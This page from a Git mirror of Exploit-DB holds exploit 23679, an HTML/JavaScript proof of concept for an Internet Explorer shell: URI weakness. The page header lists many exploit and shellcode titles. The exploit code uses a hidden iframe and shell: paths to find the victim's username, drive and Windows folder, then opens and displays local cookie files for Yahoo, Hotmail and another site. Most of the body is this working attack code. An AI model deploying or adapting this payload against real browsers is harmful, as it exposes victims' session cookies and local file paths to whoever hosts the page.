bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/23679.html
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

95 lines
No EOL
3.2 KiB
HTML
Raw Blame History

source: https://www.securityfocus.com/bid/9628/info
It has been alleged that Microsoft Internet Explorer is prone to a weakness that may potentially allow for the execution of hostile script code in the context of the My Computer Zone. This issue is related to how shell: URIs are handled by the browser. It should also be noted that shell: URIs may be used to reference local content in the same manner as file:// URIs.
Update: Although unconfirmed, further reports indicate that MSN messenger version 6.2.0137, Microsoft Word, Outlook 2003, and Outlook Express may also potentially provide exploitation vectors for this vulnerability.
<html>
<head>
</head>
<body onload=setTimeout("exploit()",4*100);>
<iframe id="Target" width="0" height="0"
src="shell:profile\Desktop.ini" name="Target" scrolling="yes">
</iframe>
<SCRIPT language=JavaScript>
function exploit(){
loc=new String(Target.location);
var len=loc.length
var n=loc.indexOf("Settings")+9;
var m=loc.indexOf("System32");
preuser=new String(loc.substring(n,len));
p=preuser.indexOf("\\");
user=new String(preuser.substring(0,p));
winloc=new String(loc.substring(6,m));
q=winloc.indexOf("\\");
rootdrive=new String(winloc.substring(0,q+1));
targetwin=window.open("");
targetwin.document.write("<b>Username :</b> "+user+"<br>");
targetwin.document.write("<b>root drive :</b> "+rootdrive+"<br>")
targetwin.document.write("<b>location of windows folder :</b>
"+winloc+"<br>")
targetwin.document.write("<b>location of user profile
:</b>"+rootdrive+"Documents and Settings\\"+user+"\\");
targetwin.document.write("<br><br><b>Wallpaper :</b><br><br><img
border=0 src='"+rootdrive+"Documents and Settings\\"+user+"\\Local
Settings\\Application Data\\Microsoft\\Wallpaper1.bmp' width=30%
height=30%>")
targetwin.document.write("<br><br><b>internet explorer wallpaper
:</b><br><br><img border=0 src='"+rootdrive+"Documents and
Settings\\"+user+"\\Application Data\\Microsoft\\Internet
Explorer\\Internet Explorer Wallpaper.bmp' width=30%
height=30%><br><br>")
var k=0;
Targeturln=new Array("");
Targeturl=new Array("");
Targeturln[0]="yahoo"
Targeturln[1]="hotmail"
Targeturln[2]="antionline"
do{
Targeturl=Targeturln[k];
contentx=new Array(x(Targeturl));
if(contentx!="") {
targetwin.document.write("<br><br><b><font size=5>Contents of the
cookie file(s) related to
"+Targeturl+"</font></b><br><br><br><font>"+contentx+"</font><br><br>");
}
if(contentx==""){
targetwin.document.write("<b><br><br><font size=5>No files found
related to "+Targeturl+"</font></b><br><br>");
}
k++;
}while(k<3);
return false;
}
function x(url){
content=new Array("");
var i=0;
do{
cookie=window.open("shell:profile\\Local
Settings\\Temp\\cookies\\"+user+"@"+url+"["+i+"].txt");
if (cookie.document.body.innerText!="")
content=content+"<br>"+user+"@"+url+"["+i+"].txt
:"+"<br><br>"+cookie.document.body.innerText;
cookie.close();
i++;
}while(i<=3);
i=0;
do{
cookie=window.open("shell:profile\\Local
Settings\\Temp\\cookies\\"+user+"@www"+url+"["+i+"].txt");
if (cookie.document.body.innerText!="")
content=content+"<br>"+user+"@www."+url+"["+i+"].txt
:"+"<br><br>"+cookie.document.body.innerText;
cookie.close();
i++;
}while(i<=3);
return content;
}
</SCRIPT>
</body>
</html>
Reference in a new issue View git blame Copy permalink